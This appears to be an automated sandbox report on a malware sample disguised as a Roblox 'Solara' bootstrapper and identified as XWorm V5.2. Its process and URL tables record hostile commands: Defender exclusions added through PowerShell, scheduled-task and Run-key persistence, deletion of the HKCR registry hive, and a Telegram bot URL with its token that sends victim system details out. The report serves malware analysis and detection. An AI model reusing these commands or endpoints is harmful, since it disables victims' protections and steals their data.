C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\_curlrc.ENC
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG2.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\ntuser.ini.ENC
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
\Device\Harddisk0\DR0
|
data
|
dropped
|
There are 227 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\8svMXMXNRn.exe
|
"C:\Users\user\Desktop\8svMXMXNRn.exe"
|
||
C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
|
"C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe"
|
||
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
|
"C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'
|
||
C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
|
"C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
--isUpdate true
|
||
C:\Windows\System32\cmd.exe
|
"cmd" /c ipconfig /all
|
||
C:\Windows\System32\ipconfig.exe
|
ipconfig /all
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
C:\Users\user\AppData\Roaming\explorer.exe
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
"C:\Users\user\AppData\Roaming\explorer.exe"
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
"C:\Users\user\AppData\Roaming\explorer.exe"
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
C:\Users\user\AppData\Roaming\explorer.exe
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
C:\Users\user\AppData\Roaming\explorer.exe
|
||
C:\Users\user\AppData\Local\Temp\voosiq.exe
|
"C:\Users\user\AppData\Local\Temp\voosiq.exe"
|
||
C:\Users\user\AppData\Local\Temp\TrojanXD.exe
|
"C:\Users\user\AppData\Local\Temp\TrojanXD.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /k reg delete HKCR /f
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
C:\Users\user\AppData\Roaming\explorer.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 7376 -s 2148
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\reg.exe
|
reg delete HKCR /f
|
||
C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
|
"C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 6524 -s 1264
|
There are 25 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.telegram.org/bot
|
unknown
|
||
https://api.telegram.org/bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A58ABE3825259C230781C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208TH9_M1_S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2
|
149.154.167.220
|
||
127.0.0.1
|
|||
cash-hispanic.gl.at.ply.gg
|
|||
http://127.0.0.1:6463
|
unknown
|
||
https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
|
172.66.44.59
|
||
http://www.nodejs.org
|
unknown
|
||
https://79c62fd6.solaraweb-alj.pages.dev
|
unknown
|
||
https://go.microsoft.co
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://ncs.roblox.com/upload
|
unknown
|
||
https://www.nodejs.org
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
|
unknown
|
||
https://aka.ms/vs/17/release/vc_redist.x64.exe
|
unknown
|
||
http://79c62fd6.solaraweb-alj.pages.dev
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://pastebin.com/raw/ZESVzSgK
|
172.67.19.24
|
||
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
|
104.20.23.46
|
||
https://getsolara.dev/api/endpoint.jsonChttps://pastebin.com/raw/ZESVzSgK
|
unknown
|
||
https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
|
unknown
|
||
http://crl.micft.cMicRosof
|
unknown
|
||
http://www.microsoft.c
|
unknown
|
||
http://127.0.0.1:6463/rpc?v=1
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://nodejs.org
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://discord.com
|
unknown
|
||
https://synapsexdocs.github.io/custom-lua-functions/console-functions/)
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://getsolara.dev/asset/discord.json
|
104.21.93.27
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://james.newtonking.com/projects/json
|
unknown
|
||
http://edge-term4-fra4.roblox.com
|
unknown
|
||
http://getsolara.dev
|
unknown
|
||
https://discord.com;http://127.0.0.1:6463/rpc?v=11
|
unknown
|
||
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
|
128.116.44.3
|
||
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
https://getsolara.dev
|
unknown
|
||
https://getsolara.dev/api/endpoint.json
|
104.21.93.27
|
||
http://127.0.0.1:64632
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://www.newtonsoft.com/jsonschema
|
unknown
|
||
https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
|
unknown
|
||
https://www.nuget.org/packages/Newtonsoft.Json.Bson
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://nodejs.org
|
unknown
|
||
http://clientsettings.roblox.com
|
unknown
|
||
http://pastebin.com
|
unknown
|
||
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
|
unknown
|
||
https://pastebin.com
|
unknown
|
||
https://pastebin.com/raw/pjseRvyK
|
unknown
|
||
https://clientsettings.roblox.com
|
unknown
|
||
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
|
unknown
|
There are 51 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cash-hispanic.gl.at.ply.gg
|
147.185.221.23
|
||
api.telegram.org
|
149.154.167.220
|
||
pastebin.com
|
172.67.19.24
|
||
clientsettings.roblox.com
|
unknown
|
||
settings-ssl.xboxlive.com
|
unknown
|
||
edge-term4-fra4.roblox.com
|
128.116.44.3
|
||
nodejs.org
|
104.20.22.46
|
||
getsolara.dev
|
104.21.93.27
|
||
79c62fd6.solaraweb-alj.pages.dev
|
172.66.44.59
|
||
www.nodejs.org
|
104.20.23.46
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
172.67.19.24
|
pastebin.com
|
United States
|
||
147.185.221.23
|
cash-hispanic.gl.at.ply.gg
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
104.21.93.27
|
getsolara.dev
|
United States
|
||
172.66.44.59
|
79c62fd6.solaraweb-alj.pages.dev
|
United States
|
||
128.116.44.3
|
edge-term4-fra4.roblox.com
|
United States
|
||
104.20.23.46
|
www.nodejs.org
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
explorer
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV21_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\58ABE3825259C230781C
|
9BCF8DFC92BC643B9414A446DA4632050DE1B7577FEDF4F7711D3B4B3D46E06D
|
||
HKEY_CURRENT_USER\SOFTWARE\58ABE3825259C230781C
|
B0CCB9A2BEF7FD24D7F31BB70A8516129A099B47D2564F9F18CB0D87144FC5DA
|
||
HKEY_CURRENT_USER\SOFTWARE\58ABE3825259C230781C
|
F6B78AFDC14A3C9CC6A54A54B8BEF95631E59B47A712FFE2BC416F5F223D329B
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Bootstrapper_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\BootstrapperV1_RASMANCS
|
FileDirectory
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
ProgramId
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
FileId
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
LowerCaseLongPath
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
LongPathHash
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
Name
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
OriginalFileName
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
Publisher
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
Version
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
BinFileVersion
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
BinaryType
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
ProductName
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
ProductVersion
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
LinkDate
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
BinProductVersion
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
AppxPackageFullName
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
Size
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
Language
|
||
\REGISTRY\A\{73523f27-98ee-6307-2ccf-0764e96a1271}\Root\InventoryApplicationFile\bootstrapperv1.2|bd73722029453b6d
|
Usn
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
|
LegacyConfigSettingsUserId
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\MediaStore
|
LastOpenedDatabaseUserId
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
AppActivationKind
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
|
EnabledFeatures
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
|
NavPaneWasCollapsed
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
AppVolume
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
PlayerIsMuted
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
|
HasLaunched
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentEdpUiPolicyState
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentNowPlayingQueueTrackId
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
|
CollectionBuildingTotalLocalItems
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
|
CollectionBuildingTotalCloudItems
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
|
RateAndReviewPromptShown
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
|
RateAndReviewLastUsedRuleset
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Marketplace
|
MarketplaceCulture
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\Content
|
CachePrefix
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\Content
|
CacheVersion
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\Content
|
CacheLimit
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\Cookies
|
CachePrefix
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\Cookies
|
CacheVersion
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\Cookies
|
CacheLimit
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\History
|
CachePrefix
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\History
|
CacheVersion
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.zunemusic_8wekyb3d8bbwe\Internet
Settings\Cache\History
|
CacheLimit
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\GeneralSettings
|
LastVersionOfBackgroundTaskRegistered
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentSeekPosition
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserId
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignInAccountRegion
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserExplicitPrivilege
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserCid
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserSignInName
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserFirstName
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserLastName
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserBrowseAge
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserUseAge
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
ConfigLastDownload
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\FUE
|
ShowFUE
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Music
|
LastSelectedCollectionPage
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
|
LastUsedAppNavigationMonikerData
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
AppActivationKind
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
AppVolume
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentEdpUiPolicyState
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentNowPlayingQueueTrackId
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Service
|
LastSignedInUserId
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Marketplace
|
MarketplaceCulture
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
|
EnabledFeatures
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentEdpUiPolicyState
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentSeekPosition
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentSeekPosition
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentSeekPosition
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Playback
|
CurrentEdpUiPolicyState
|
||
\REGISTRY\A\{f220b98d-5a3c-f67a-ea9d-e73ab70fd258}\LocalState\Configuration\Shell
|
NavPaneWasCollapsed
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
ProgramId
|
||
\REGISTRY\A\{30aae44e-6d30-5cbd-9733-80aa578d57cf}\Root\InventoryApplicationFile\bootstrapperv21.|e68786e5070fadd6
|
FileId
|
||
